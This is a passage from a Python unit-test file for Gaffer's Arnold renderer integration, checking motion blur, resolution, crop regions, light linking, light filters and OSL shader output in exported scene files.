arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( universe, "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrices = arnold.AiNodeGetArray( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( universe, "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrices = arnold.AiNodeGetArray( plane, "matrix" )
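            # With transform blur enabled, motion samples should span the shutter,
            # presumably the default 0.5-frame shutter centred on the frame:
            # 0.75 to 1.25 for frame 1.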
self.assertEqual( sphereMotionStart, 0.75 )
self.assertEqual( sphereMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( sphereMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( sphereMatrices.contents ), 2 )
self.assertEqual( planeMotionStart, 0.75 )
self.assertEqual( planeMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( planeMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( planeMatrices.contents ), 2 )
for i in range( 0, 2 ) :
frame = 0.75 + 0.5 * i
sphereMatrix = arnold.AiArrayGetMtx( sphereMatrices, i )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, frame * 2, frame - 1 ) )
planeMatrix = arnold.AiArrayGetMtx( planeMatrices, i )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, frame - 1 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 0.75 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 1.25 )
self.assertEqual( arnold.AiNodeGetBool( arnold.AiUniverseGetOptions( universe ), "ignore_motion_blur" ), False )
# Motion blur on, but sampleMotion off
s["options"]["options"]["sampleMotion"]["enabled"].setValue( True )
s["options"]["options"]["sampleMotion"]["value"].setValue( False )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
camera = arnold.AiNodeLookUpByName( universe, "gaffer:defaultCamera" )
sphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
sphereMotionStart = arnold.AiNodeGetFlt( sphere, "motion_start" )
sphereMotionEnd = arnold.AiNodeGetFlt( sphere, "motion_end" )
sphereMatrices = arnold.AiNodeGetArray( sphere, "matrix" )
plane = arnold.AiNodeLookUpByName( universe, "/group/plane" )
planeMotionStart = arnold.AiNodeGetFlt( plane, "motion_start" )
planeMotionEnd = arnold.AiNodeGetFlt( plane, "motion_end" )
planeMatrices = arnold.AiNodeGetArray( plane, "matrix" )
self.assertEqual( sphereMotionStart, 0.75 )
self.assertEqual( sphereMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( sphereMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( sphereMatrices.contents ), 2 )
self.assertEqual( planeMotionStart, 0.75 )
self.assertEqual( planeMotionEnd, 1.25 )
self.assertEqual( arnold.AiArrayGetNumElements( planeMatrices.contents ), 1 )
self.assertEqual( arnold.AiArrayGetNumKeys( planeMatrices.contents ), 2 )
for i in range( 0, 2 ) :
frame = 0.75 + 0.5 * i
sphereMatrix = arnold.AiArrayGetMtx( sphereMatrices, i )
expectedSphereMatrix = arnold.AiM4Translation( arnold.AtVector( 0, frame * 2, frame - 1 ) )
planeMatrix = arnold.AiArrayGetMtx( planeMatrices, i )
expectedPlaneMatrix = arnold.AiM4Translation( arnold.AtVector( 1, 0, frame - 1 ) )
self.assertEqual( self.__m44f( sphereMatrix ), self.__m44f( expectedSphereMatrix ) )
self.assertEqual( self.__m44f( planeMatrix ), self.__m44f( expectedPlaneMatrix ) )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_start" ), 0.75 )
self.assertEqual( arnold.AiNodeGetFlt( camera, "shutter_end" ), 1.25 )
self.assertEqual( arnold.AiNodeGetBool( arnold.AiUniverseGetOptions( universe ), "ignore_motion_blur" ), True )
def testResolution( self ) :
s = Gaffer.ScriptNode()
s["camera"] = GafferScene.Camera()
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["camera"]["out"] )
s["options"]["options"]["renderResolution"]["enabled"].setValue( True )
s["options"]["options"]["renderResolution"]["value"].setValue( imath.V2i( 200, 100 ) )
s["options"]["options"]["resolutionMultiplier"]["enabled"].setValue( True )
s["options"]["options"]["resolutionMultiplier"]["value"].setValue( 2 )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# Default camera should have the right resolution.
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions( universe )
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 400 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 200 )
# As should a camera picked from the scene.
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/camera" )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions( universe )
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 400 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 200 )
def testRenderRegion( self ) :
s = Gaffer.ScriptNode()
s["camera"] = GafferScene.Camera()
s["options"] = GafferScene.StandardOptions()
s["options"]["in"].setInput( s["camera"]["out"] )
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/camera" )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# Default region
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions( universe )
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 639 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )
# Apply Crop Window
s["options"]["options"]["renderCropWindow"]["enabled"].setValue( True )
s["options"]["options"]["renderCropWindow"]["value"].setValue( imath.Box2f( imath.V2f( 0.25, 0.5 ), imath.V2f( 0.75, 1.0 ) ) )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions( universe )
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 160 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 479 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 240 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )
# Test Empty Crop Window
s["options"]["options"]["renderCropWindow"]["value"].setValue( imath.Box2f() )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions( universe )
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
# Since Arnold doesn't support empty regions, we default to one pixel in the corner
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 0 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), 479 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 479 )
# Apply Overscan
s["options"]["options"]["renderCropWindow"]["enabled"].setValue( False )
s["options"]["options"]["overscan"]["enabled"].setValue( True )
s["options"]["options"]["overscan"]["value"].setValue( True )
s["options"]["options"]["overscanTop"]["enabled"].setValue( True )
s["options"]["options"]["overscanTop"]["value"].setValue( 0.1 )
s["options"]["options"]["overscanBottom"]["enabled"].setValue( True )
s["options"]["options"]["overscanBottom"]["value"].setValue( 0.2 )
s["options"]["options"]["overscanLeft"]["enabled"].setValue( True )
s["options"]["options"]["overscanLeft"]["value"].setValue( 0.3 )
s["options"]["options"]["overscanRight"]["enabled"].setValue( True )
s["options"]["options"]["overscanRight"]["value"].setValue( 0.4 )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
options = arnold.AiUniverseGetOptions( universe )
self.assertEqual( arnold.AiNodeGetInt( options, "xres" ), 640 )
self.assertEqual( arnold.AiNodeGetInt( options, "yres" ), 480 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_x" ), -192 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_x" ), 640 + 255 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_min_y" ), -48 )
self.assertEqual( arnold.AiNodeGetInt( options, "region_max_y" ), 480 + 95 )
def testMissingCameraRaises( self ) :
s = Gaffer.ScriptNode()
s["options"] = GafferScene.StandardOptions()
s["options"]["options"]["renderCamera"]["enabled"].setValue( True )
s["options"]["options"]["renderCamera"]["value"].setValue( "/i/dont/exist" )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["options"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
# The requested camera doesn't exist - this should raise an exception.
six.assertRaisesRegex( self, RuntimeError, "/i/dont/exist", s["render"]["task"].execute )
# And even the existence of a different camera shouldn't change that.
s["camera"] = GafferScene.Camera()
s["options"]["in"].setInput( s["camera"]["out"] )
six.assertRaisesRegex( self, RuntimeError, "/i/dont/exist", s["render"]["task"].execute )
def testManyCameras( self ) :
camera = GafferScene.Camera()
duplicate = GafferScene.Duplicate()
duplicate["in"].setInput( camera["out"] )
duplicate["target"].setValue( "/camera" )
duplicate["copies"].setValue( 1000 )
render = GafferArnold.ArnoldRender()
render["in"].setInput( duplicate["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
def testTwoRenders( self ) :
sphere = GafferScene.Sphere()
duplicate = GafferScene.Duplicate()
duplicate["in"].setInput( sphere["out"] )
duplicate["target"].setValue( "/sphere" )
duplicate["copies"].setValue( 10000 )
render = GafferArnold.ArnoldRender()
render["in"].setInput( duplicate["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.####.ass" )
errors = []
def executeFrame( frame ) :
with Gaffer.Context() as c :
c.setFrame( frame )
try :
render["task"].execute()
except Exception as e :
errors.append( str( e ) )
threads = []
for i in range( 0, 2 ) :
t = threading.Thread( target = executeFrame, args = ( i, ) )
t.start()
threads.append( t )
for t in threads :
t.join()
if [ int( v ) for v in arnold.AiGetVersion()[:3] ] >= [ 7, 0, 0 ] :
with Gaffer.Context() as c :
for i in range( 0, 2 ) :
c.setFrame( i )
self.assertTrue( os.path.exists( c.substitute( render["fileName"].getValue() ) ) )
else :
self.assertEqual( len( errors ), 1 )
self.assertTrue( "Arnold is already in use" in errors[0] )
def testTraceSets( self ) :
sphere = GafferScene.Sphere()
group = GafferScene.Group()
group["in"][0].setInput( sphere["out"] )
group["in"][1].setInput( sphere["out"] )
set1 = GafferScene.Set()
set1["name"].setValue( "render:firstSphere" )
set1["paths"].setValue( IECore.StringVectorData( [ "/group/sphere" ] ) )
set1["in"].setInput( group["out"] )
set2 = GafferScene.Set()
set2["name"].setValue( "render:secondSphere" )
set2["paths"].setValue( IECore.StringVectorData( [ "/group/sphere1" ] ) )
set2["in"].setInput( set1["out"] )
set3 = GafferScene.Set()
set3["name"].setValue( "render:group" )
set3["paths"].setValue( IECore.StringVectorData( [ "/group" ] ) )
set3["in"].setInput( set2["out"] )
set4 = GafferScene.Set()
set4["name"].setValue( "render:bothSpheres" )
set4["paths"].setValue( IECore.StringVectorData( [ "/group/sphere", "/group/sphere1" ] ) )
set4["in"].setInput( set3["out"] )
render = GafferArnold.ArnoldRender()
render["in"].setInput( set4["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
firstSphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
secondSphere = arnold.AiNodeLookUpByName( universe, "/group/sphere1" )
self.assertEqual( self.__arrayToSet( arnold.AiNodeGetArray( firstSphere, "trace_sets" ) ), { "firstSphere", "group", "bothSpheres" } )
self.assertEqual( self.__arrayToSet( arnold.AiNodeGetArray( secondSphere, "trace_sets" ) ), { "secondSphere", "group", "bothSpheres" } )
def testSetsNeedContextEntry( self ) :
script = Gaffer.ScriptNode()
script["light"] = GafferArnold.ArnoldLight()
script["light"].loadShader( "point_light" )
script["expression"] = Gaffer.Expression()
script["expression"].setExpression(
"""parent["light"]["name"] = context["lightName"]"""
)
script["render"] = GafferArnold.ArnoldRender()
script["render"]["in"].setInput( script["light"]["out"] )
script["render"]["mode"].setValue( script["render"].Mode.SceneDescriptionMode )
script["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
for i in range( 0, 100 ) :
with Gaffer.Context() as context :
context["lightName"] = "light%d" % i
script["render"]["task"].execute()
def testFrameAndAASeed( self ) :
options = GafferArnold.ArnoldOptions()
render = GafferArnold.ArnoldRender()
render["in"].setInput( options["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
for frame in ( 1, 2, 2.8, 3.2 ) :
for seed in ( None, 3, 4 ) :
with Gaffer.Context() as c :
c.setFrame( frame )
options["options"]["aaSeed"]["enabled"].setValue( seed is not None )
options["options"]["aaSeed"]["value"].setValue( seed or 1 )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
self.assertEqual(
arnold.AiNodeGetInt( arnold.AiUniverseGetOptions( universe ), "AA_seed" ),
seed or round( frame )
)
def testRendererContextVariable( self ) :
sphere = GafferScene.Sphere()
sphere["name"].setValue( "sphere${scene:renderer}" )
render = GafferArnold.ArnoldRender()
render["in"].setInput( sphere["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
self.assertTrue( arnold.AiNodeLookUpByName( universe, "/sphereArnold" ) is not None )
def testAdaptors( self ) :
sphere = GafferScene.Sphere()
def a() :
result = GafferArnold.ArnoldAttributes()
result["attributes"]["matte"]["enabled"].setValue( True )
result["attributes"]["matte"]["value"].setValue( True )
return result
GafferScene.SceneAlgo.registerRenderAdaptor( "Test", a )
sphere = GafferScene.Sphere()
render = GafferArnold.ArnoldRender()
render["in"].setInput( sphere["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
node = arnold.AiNodeLookUpByName( universe, "/sphere" )
self.assertEqual( arnold.AiNodeGetBool( node, "matte" ), True )
def testLightAndShadowLinking( self ) :
sphere1 = GafferScene.Sphere()
sphere2 = GafferScene.Sphere()
attributes = GafferScene.StandardAttributes()
arnoldAttributes = GafferArnold.ArnoldAttributes()
light1 = GafferArnold.ArnoldLight()
light1.loadShader( "point_light" )
light2 = GafferArnold.ArnoldLight()
light2.loadShader( "point_light" )
group = GafferScene.Group()
render = GafferArnold.ArnoldRender()
attributes["in"].setInput( sphere1["out"] )
arnoldAttributes["in"].setInput( attributes["out"] )
group["in"][0].setInput( arnoldAttributes["out"] )
group["in"][1].setInput( light1["out"] )
group["in"][2].setInput( light2["out"] )
group["in"][3].setInput( sphere2["out"] )
render["in"].setInput( group["out"] )
# Illumination
attributes["attributes"]["linkedLights"]["enabled"].setValue( True )
attributes["attributes"]["linkedLights"]["value"].setValue( "/group/light" )
# Shadows
arnoldAttributes["attributes"]["shadowGroup"]["enabled"].setValue( True )
arnoldAttributes["attributes"]["shadowGroup"]["value"].setValue( "/group/light1" )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
# the first sphere had linked lights
sphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
# check illumination
self.assertTrue( arnold.AiNodeGetBool( sphere, "use_light_group" ) )
lights = arnold.AiNodeGetArray( sphere, "light_group" )
self.assertEqual( arnold.AiArrayGetNumElements( lights ), 1 )
self.assertEqual(
arnold.AiNodeGetName( arnold.AiArrayGetPtr( lights, 0 ) ),
"light:/group/light"
)
# check shadows
self.assertTrue( arnold.AiNodeGetBool( sphere, "use_shadow_group" ) )
shadows = arnold.AiNodeGetArray( sphere, "shadow_group" )
self.assertEqual( arnold.AiArrayGetNumElements( shadows ), 1 )
self.assertEqual(
arnold.AiNodeGetName( arnold.AiArrayGetPtr( shadows, 0 ) ),
"light:/group/light1"
)
# the second sphere does not have any light linking enabled
sphere1 = arnold.AiNodeLookUpByName( universe, "/group/sphere1" )
# check illumination
self.assertFalse( arnold.AiNodeGetBool( sphere1, "use_light_group" ) )
lights = arnold.AiNodeGetArray( sphere1, "light_group" )
self.assertEqual( arnold.AiArrayGetNumElements( lights ), 0 )
# check shadows
self.assertFalse( arnold.AiNodeGetBool( sphere1, "use_shadow_group" ) )
shadows = arnold.AiNodeGetArray( sphere1, "shadow_group" )
self.assertEqual( arnold.AiArrayGetNumElements( shadows ), 0 )
def testNoLinkedLightsOnLights( self ) :
sphere = GafferScene.Sphere()
meshLightShader = GafferArnold.ArnoldShader()
meshLightShader.loadShader( "flat" )
meshLightFilter = GafferScene.PathFilter()
meshLightFilter["paths"].setValue( IECore.StringVectorData( [ "/sphere" ] ) )
meshLight = GafferArnold.ArnoldMeshLight()
meshLight["in"].setInput( sphere["out"] )
meshLight["filter"].setInput( meshLightFilter["out"] )
meshLight["parameters"]["color"].setInput( meshLightShader["out"] )
light1 = GafferArnold.ArnoldLight()
light1.loadShader( "point_light" )
light2 = GafferArnold.ArnoldLight()
light2.loadShader( "point_light" )
# Trigger light linking by unlinking a light
light2["defaultLight"].setValue( False )
group = GafferScene.Group()
group["in"][0].setInput( meshLight["out"] )
group["in"][1].setInput( light1["out"] )
group["in"][2].setInput( light2["out"] )
render = GafferArnold.ArnoldRender()
render["in"].setInput( group["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
sphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
self.assertIsNotNone( sphere )
self.assertEqual( arnold.AiArrayGetNumElements( arnold.AiNodeGetArray( sphere, "light_group" ) ), 0 )
self.assertFalse( arnold.AiNodeGetBool( sphere, "use_light_group" ) )
def testLightFilters( self ) :
s = Gaffer.ScriptNode()
s["lightFilter"] = GafferArnold.ArnoldLightFilter()
s["lightFilter"].loadShader( "light_blocker" )
s["attributes"] = GafferScene.StandardAttributes()
s["attributes"]["in"].setInput( s["lightFilter"]["out"] )
s["attributes"]["attributes"]["filteredLights"]["enabled"].setValue( True )
s["attributes"]["attributes"]["filteredLights"]["value"].setValue( "defaultLights" )
s["light"] = GafferArnold.ArnoldLight()
s["light"].loadShader( "point_light" )
s["gobo"] = GafferArnold.ArnoldShader()
s["gobo"].loadShader( "gobo" )
s["assignment"] = GafferScene.ShaderAssignment()
s["assignment"]["in"].setInput( s["light"]["out"] )
s["assignment"]["shader"].setInput( s["gobo"]["out"] )
s["group"] = GafferScene.Group()
s["group"]["in"][0].setInput( s["attributes"]["out"] )
s["group"]["in"][1].setInput( s["assignment"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["group"]["out"] )
s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
s["render"]["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
s["render"]["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
light = arnold.AiNodeLookUpByName( universe, "light:/group/light" )
linkedFilters = arnold.AiNodeGetArray( light, "filters" )
numFilters = arnold.AiArrayGetNumElements( linkedFilters.contents )
self.assertEqual( numFilters, 2 )
linkedFilter = arnold.cast(arnold.AiArrayGetPtr(linkedFilters, 0), arnold.POINTER(arnold.AtNode))
linkedGobo = arnold.cast(arnold.AiArrayGetPtr(linkedFilters, 1), arnold.POINTER(arnold.AtNode))
self.assertEqual( arnold.AiNodeGetName( linkedFilter ), "lightFilter:/group/lightFilter" )
self.assertEqual( arnold.AiNodeEntryGetName( arnold.AiNodeGetNodeEntry( linkedFilter ) ), "light_blocker" )
self.assertEqual( arnold.AiNodeEntryGetName( arnold.AiNodeGetNodeEntry( linkedGobo ) ), "gobo" )
@GafferTest.TestRunner.PerformanceTestMethod( repeat = 1 )
def testLightFiltersMany( self ) :
numLights = 10000
numLightFilters = 10000
s = Gaffer.ScriptNode()
s["lightFilter"] = GafferArnold.ArnoldLightFilter()
s["lightFilter"].loadShader( "light_blocker" )
s["lightFilter"]["filteredLights"].setValue( "defaultLights" )
s["planeFilters"] = GafferScene.Plane( "Plane" )
s["planeFilters"]["divisions"].setValue( imath.V2i( 1, numLightFilters / 2 - 1 ) )
s["instancerFilters"] = GafferScene.Instancer( "Instancer" )
s["instancerFilters"]["in"].setInput( s["planeFilters"]["out"] )
s["instancerFilters"]["instances"].setInput( s["lightFilter"]["out"] )
s["instancerFilters"]["parent"].setValue( "/plane" )
s["light"] = GafferArnold.ArnoldLight()
s["light"].loadShader( "point_light" )
s["planeLights"] = GafferScene.Plane( "Plane" )
s["planeLights"]["divisions"].setValue( imath.V2i( 1, numLights / 2 - 1 ) )
s["instancerLights"] = GafferScene.Instancer( "Instancer" )
s["instancerLights"]["in"].setInput( s["planeLights"]["out"] )
s["instancerLights"]["instances"].setInput( s["light"]["out"] )
s["instancerLights"]["parent"].setValue( "/plane" )
s["group"] = GafferScene.Group( "Group" )
s["group"]["in"][0].setInput( s["instancerFilters"]["out"] )
s["group"]["in"][1].setInput( s["instancerLights"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["group"]["out"] )
with Gaffer.Context() as c :
c["scene:render:sceneTranslationOnly"] = IECore.BoolData( True )
s["render"]["task"].execute()
def testAbortRaises( self ) :
s = Gaffer.ScriptNode()
s["plane"] = GafferScene.Plane()
s["plane"]["transform"]["translate"]["z"].setValue( -10 )
s["shader"] = GafferArnold.ArnoldShader()
s["shader"].loadShader( "image" )
# Missing texture should cause render to abort
s["shader"]["parameters"]["filename"].setValue( "iDontExist" )
s["filter"] = GafferScene.PathFilter()
s["filter"]["paths"].setValue( IECore.StringVectorData( [ "/plane" ] ) )
s["shaderAssignment"] = GafferScene.ShaderAssignment()
s["shaderAssignment"]["in"].setInput( s["plane"]["out"] )
s["shaderAssignment"]["filter"].setInput( s["filter"]["out"] )
s["shaderAssignment"]["shader"].setInput( s["shader"]["out"] )
s["outputs"] = GafferScene.Outputs()
s["outputs"].addOutput(
"beauty",
IECoreScene.Output(
self.temporaryDirectory() + "/test.tif",
"tiff",
"rgba",
{}
)
)
s["outputs"]["in"].setInput( s["shaderAssignment"]["out"] )
s["render"] = GafferArnold.ArnoldRender()
s["render"]["in"].setInput( s["outputs"]["out"] )
six.assertRaisesRegex( self, RuntimeError, "Render aborted", s["render"]["task"].execute )
def testOSLShaders( self ) :
purple = GafferOSL.OSLShader()
purple.loadShader( "Maths/MixColor" )
purple["parameters"]["a"].setValue( imath.Color3f( 0.5, 0, 1 ) )
green = GafferOSL.OSLShader()
green.loadShader( "Maths/MixColor" )
green["parameters"]["a"].setValue( imath.Color3f( 0, 1, 0 ) )
mix = GafferOSL.OSLShader()
mix.loadShader( "Maths/MixColor" )
# test component connections
mix["parameters"]["a"][2].setInput( purple["out"]["out"][2] )
# test color connections
mix["parameters"]["b"].setInput( green["out"]["out"] )
mix["parameters"]["m"].setValue( 0.5 )
ball = GafferArnold.ArnoldShaderBall()
ball["shader"].setInput( mix["out"] )
catalogue = GafferImage.Catalogue()
outputs = GafferScene.Outputs()
outputs.addOutput(
"beauty",
IECoreScene.Output(
"test",
"ieDisplay",
"rgba",
{
"driverType" : "ClientDisplayDriver",
"displayHost" : "localhost",
"displayPort" : str( catalogue.displayDriverServer().portNumber() ),
"remoteDisplayType" : "GafferImage::GafferDisplayDriver",
}
)
)
outputs["in"].setInput( ball["out"] )
render = GafferArnold.ArnoldRender()
render["in"].setInput( outputs["out"] )
with GafferTest.ParallelAlgoTest.UIThreadCallHandler() as handler :
render["task"].execute()
handler.waitFor( 0.1 ) #Just need to let the catalogue update
self.assertEqual( self.__color4fAtUV( catalogue, imath.V2f( 0.5 ) ), imath.Color4f( 0, 0.5, 0.5, 1 ) )
def testDefaultLightsMistakesDontForceLinking( self ) :
light = GafferArnold.ArnoldLight()
light.loadShader( "point_light" )
sphere = GafferScene.Sphere()
# It doesn't make sense to add a non-light to the "defaultLights"
# set like this, but in the event of user error, we don't want to
# emit light links unnecessarily.
sphereSet = GafferScene.Set()
sphereSet["in"].setInput( sphere["out"] )
sphereSet["name"].setValue( "defaultLights" )
sphereSet["paths"].setValue( IECore.StringVectorData( [ "/sphere" ] ) )
group = GafferScene.Group()
group["in"][0].setInput( light["out"] )
group["in"][1].setInput( sphereSet["out"] )
render = GafferArnold.ArnoldRender()
render["in"].setInput( group["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
render["fileName"].setValue( self.temporaryDirectory() + "/test.ass" )
render["task"].execute()
with IECoreArnold.UniverseBlock( writable = True ) as universe :
arnold.AiASSLoad( universe, self.temporaryDirectory() + "/test.ass" )
sphere = arnold.AiNodeLookUpByName( universe, "/group/sphere" )
self.assertIsNotNone( sphere )
self.assertEqual( arnold.AiArrayGetNumElements( arnold.AiNodeGetArray( sphere, "light_group" ) ), 0 )
self.assertFalse( arnold.AiNodeGetBool( sphere, "use_light_group" ) )
def testLightLinkingWarnings( self ) :
# Emulate a meshlight that has been set up sloppily - it is filtered to 4 locations, some actually
# have meshes, some don't
lightSphere = GafferScene.Sphere()
lightInvalid = GafferScene.Group()
lightGroup = GafferScene.Group()
lightGroup["name"].setValue( "lightGroup" )
lightGroup["in"][0].setInput( lightSphere["out"] ) # Has a mesh
lightGroup["in"][1].setInput( lightSphere["out"] ) # Has a mesh
lightGroup["in"][2].setInput( lightInvalid["out"] ) # Doesn't have a mesh
lightGroup["in"][3].setInput( lightInvalid["out"] ) # Doesn't have a mesh
meshLightFilter = GafferScene.PathFilter()
meshLightFilter["paths"].setValue( IECore.StringVectorData( [ "/lightGroup/*" ] ) )
meshLight = GafferArnold.ArnoldMeshLight()
meshLight["in"].setInput( lightGroup["out"] )
meshLight["filter"].setInput( meshLightFilter["out"] )
geoSphere = GafferScene.Sphere()
geoGroup = GafferScene.Group()
geoGroup["name"].setValue( "geoGroup" )
for i in range( 20 ):
geoGroup["in"][i].setInput( geoSphere["out"] )
group = GafferScene.Group()
group["in"][0].setInput( geoGroup["out"] )
group["in"][1].setInput( meshLight["out"] )
attributeFilter = GafferScene.PathFilter()
attributeFilter["paths"].setValue( IECore.StringVectorData( [ "/group/geoGroup/*" ] ) )
attributes = GafferScene.StandardAttributes()
attributes["in"].setInput( group["out"] )
attributes["filter"].setInput( attributeFilter["out"] )
attributes["attributes"]["linkedLights"]["enabled"].setValue( True )
# Link some ( but not all ) lights, so we have to do actual light linking
attributes["attributes"]["linkedLights"]["value"].setValue(
"/group/lightGroup/sphere1 /group/lightGroup/group /group/lightGroup/group1"
)
render = GafferArnold.ArnoldRender()
render["in"].setInput( attributes["out"] )
render["mode"].setValue( render.Mode.SceneDescriptionMode )
